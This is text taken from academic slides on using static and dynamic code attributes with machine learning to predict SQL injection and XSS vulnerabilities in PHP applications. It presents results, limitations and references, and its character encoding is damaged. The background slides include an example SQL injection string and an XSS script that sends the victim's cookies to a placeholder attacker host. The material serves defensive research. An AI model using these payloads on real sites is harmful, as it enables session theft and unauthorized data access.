Problem Deﬁni7on 1/2 Input valida,on and sani,za,on are two common defense methods used in web applica7ons Sta,c a2ributes have been shown to be indicators of vulnerabili7es, though not accurate enough Can we use Sta7c and dynamic aPributes together characterizing the implementa7ons of these defense methods as indicators? Machine learning to predict vulnerability based on aPributes
Problem Deﬁni7on 2/2 Typical predic7on models are classiﬁca7on-‐based Being supervised learning, their eﬀec7veness is dependent on the availability of suﬃcient training data tagged with class labels Cluster analysis (CA) is a type of unsupervised learning methods CA may be used if vulnerable instances can be dis7nguished from non-‐vulnerable instances based on the proposed aPributes
SQL Injec7on 7Hackerlogin.phpDatabase$name = ’ or 1=1 --$q = “select * from user wherename=‘’ or 1=1--’ and pw=‘’ Cause: Inadequate valida7on and sani7za7on of user inputs used in queries $q = “select * from user wherename=‘”.$name.“’ and pw=‘”.$pw.“’”Unauthorized user informationSQLI!
Cross Site Scrip7ng Cause: No sanity check of input before used in HTML documents Hacker Victim travelerTip.phpInject Script: <script>alert(xss!);</script>Visithttp://travelingForum/travelerTip.php?Action=Post&Place=Greece&Tip=<Script>document.location=‘http://hackerSite/stealCookie.jsp?cookie=’+document.cookie; </Script>Injected Script executed onvictim’s browserXSS!
Vulnerability Predic7on Principles 1/2 Using hybrid code a2ributes to predict vulnerabili7es Based on both sta7c and dynamic program analyses Input valida7on checks and sani7za7on opera7ons mainly based on string opera,ons e.g., preg_replace(“<script”, “”, $data) Classify the types of string opera7ons applied according to their poten,al eﬀects on the inputs before their use in security-‐sensi7ve statements—sinks e.g., echo $data; mysql_query($data) Such valida7on checks and opera7ons can be iden7ﬁed by analyzing data dependence graphs
Vulnerability Predic7on Principles 2/2 Given the data dependence graph of a sink: extrac,ng the number of inputs, and the numbers and types of valida,on and sani,za,on func,ons from the graph, can we predict the sink’s vulnerability? E.g., if a sink uses ﬁve diﬀerent inputs, there should at least be ﬁve input valida7on or sani7za7on func7ons. sink
Sta7c and Dynamic Classiﬁca7on From the language built-‐in func7ons that have speciﬁc security purposes, the language operators, and the predeﬁned language parameters used, a node is classiﬁed sta,cally. e.g., addslashes($input), $_GET, $a = $b . $c But it is classiﬁed dynamically if the node invokes user-‐deﬁned func7ons or some built-‐in func7ons such as string replacement. e.g., $sanitized = preg_replace(“<+”, “”, $input) The func7on code is executed using a set of predeﬁned test inputs, and the ﬁnal values of test input variables are searched for malicious characters.
Hybrid Code APributes AttributeIDAttribute Name DescriptionStatic attributes1 Client The number of nodes that access data from HTTP request parameters2 File The number of nodes that access data from files3 Database The number of nodes that access data from database4 Text-database Boolean value ‘TRUE’ if there is any text-based data accessed from database; ‘FALSE’ otherwise5 Other-database Boolean value ‘TRUE’ if there is any data except text-based data accessed from database; ‘FALSE’otherwise6 Session The number of nodes that access data from persistent data objects7 Uninit The number of nodes that reference un-initialized program variable8 SQLI-sanitization The number of nodes that apply standard sanitization functions for preventing SQLI issues9 XSS-sanitization The number of nodes that apply standard sanitization functions for preventing XSS issues10 Numeric-casting The number of nodes that type-cast data into a numeric type data11 Numeric-type-check The number of nodes that perform numeric data type check12 Encoding The number of nodes that encode data into a certain format13 Un-taint The number of nodes that return predefined information or information not influenced by externalusers14 Boolean The number of nodes which invoke functions that return Boolean value15 Propagate The number of nodes that propagate partial or complete value of an inputDynamic attributes16 Numeric The number of nodes which invoke functions that return only numeric, mathematic, or dash characters17 LimitLength The number of nodes that invoke string-length limiting functions18 URL The number of nodes that invoke path-filtering functions19 EventHandler The number of nodes that invoke event-handler filtering functions20 HTMLTag The number of nodes that invoke HTML-tag filtering functions21 Delimiter The number of nodes that invoke delimiter filtering functions22 AlternateEncode The number of nodes that invoke alternate-character-encoding filtering functionsTarget attribute23 Vulnerable? Indicates a class label—Vulnerable or Not-Vulnerable
Sample APribute Vectors • Each sink would be represented by a 23-‐dimensional aPribute vector. • Sample aPribute vectors (Session, XSS-‐sanit, Un-‐taint, Delimiter, Propagate,…, Vulnerable?): (2, 4, 0, 0, 2,…, Not-‐Vulnerable) (1, 0, 1, 1, 7,…, Vulnerable) 13/50
Unsupervised Vulnerability Predic7on Use same data preprocessing ac7vi7es as supervised models K-‐means cluster analysis based on two assump7ons non-‐vulnerable sinks are much more frequent than vulnerable sinks vulnerable sinks have diﬀerent characteris7cs from non-‐vulnerable sinks Label clusters as Vulnerable or Non-‐Vulnerable: K=4: Maximum number of clusters %Normal=12: Minimum size of non-‐vulnerable cluster
Case Study Six open source, web applica7ons (PHP): Known vulnerable Func7onali7es: school admin, forum, news, content, database management Sizes: from 2k – 44k LOC Vulnerability iden7ﬁca7on: manual & vuln. databases – Bugtraq, CVE 16
Experiment & Result 1/2 Classification results of predictors built from hybrid attributes.LR performs better than MLPMaximum analysis time: 2 hours, average ½ hourAccuracyShin et al. TSE’113 achieved recall>80 and pf<25Pixy S&P’061 reported pf>20.Too many false positives!Ardilla ICSE’094 reported up to 50% of paths leftunexplored.... False negatives? Our result recall=90, pf=5Measure (%) àData & Classifierrecall false alarm precisionschmate-html LR 99 3 98MLP 99 0 100faqforge-html LR 89 5 94MLP 91 5 94utopia-html LR 94 1 94MLP 94 2 89phorum-html LR 78 1 70MLP 33 0 100cutesite-html LR 68 9 61MLP 78 8 67myadmin-html LR 85 1 89MLP 75 1 83Average results on XSS prediction LR 86 3 84MLP 78 3 89schmate-sql LR 97 8 98MLP 96 35 92faqforge-sql LR 88 4 94MLP 88 4 94phorum-sql LR 100 3 63MLP 0 1 0cutesite-sql LR 91 14 89MLP 89 18 86Average results on SQLI prediction LR 94 7 86MLP 68 15 68Overall average LR 90 5 85MLP 74 8 81
Experiment & Result 2/2 Measure (%)Data recall false alarm precisionutopia-html 100 13 65phorum-html 56 11 16cutesite-html 70 20 41myadmin-html 55 8 33phorum-sql 100 7 38Average 76 12 39k-means clustering analysis results on the datasets which have < 40% vulnerable sinksMeasure (%)Data recall false alarm precisionschmate-html 9 0 100faqforge-html 26 0 100schmate-sql 3 32 29faqforge-sql 0 0 undefinedcutesite-sql 0 0 undefinedAverage 8 6 undefinedk-means clustering analysis results on the datasets which have ≥ 40% vulnerable sinks When assumptions are not met, clustering does not work!
Limita7ons Supervised learning requires suﬃcient labeled data for training Unsupervised learning relies on some assump7ons, which are not always true: Applicable for most commercial systems? For unsupervised learning, tuning the parameters is required: K: Maximum number of clusters %Normal: Minimum size of non-‐vulnerable cluster
Conclusion Security audi7ng by providing probabilis7c alerts about vulnerable code statements. Propose hybrid (sta7c and Dynamic) code aPributes for vulnerability predic,on using machine learning APributes characterize common input valida7on and sani7za7on code paPerns, without expensive analysis Scalability: < 2 hours on a regular PC Both supervised learning and unsupervised learning methods were used Supervised learning accuracy: 90% R, 85% P Unsupervised learning: Lower accuracy, applicability?
Future Work Semi-‐supervised learning Combining data dependency informa7on with control dependency informa7on Address other types of similar vulnerabili7es by considering other types of code paPerns
The End! hPp://sharlwinkhin.com 23/50Thank You!Question?
References 1. N. Jovanovic, C. Kruegel, and E. Kirda, “Pixy: a sta7c analysis tool for detec7ng web applica7on vulnerabili7es,” in IEEE Symposium on Security and Privacy, 2006, pp. 258-‐263. 2. D. Balzarou et al., “Saner: composing sta7c and dynamic analysis to validate sani7za7on in web applica7ons,” in IEEE Symposium on Security and Privacy, 2008, pp. 387-‐401. 3. Y. Shin, A. Meneely, L. Williams, and J. A. Osborne, “Evalua7ng complexity, code churn, and developer ac7vity metrics as indicators of sowware vulnerabili7es,” IEEE Transac7ons on Sowware Engineering, vol. 37 (6), pp. 772-‐787, 2011. 4. Kieżun, A., Guo, P. J., Jayaraman, K., and Ernst, M. D. 2009. Automa7c crea7on of SQL injec7on and cross-‐site scrip7ng aPacks. In Proceedings of the 31st Interna,onal Conference on SoTware Engineering, Vancouver, BC, pp. 199-‐209. 5. RSnake. hPp://ha.ckers.org, accessed March 2012. 6. I. H. WiPen and E. Frank, Data Mining, 2nd ed., Morgan Kaufmann, 2005. 24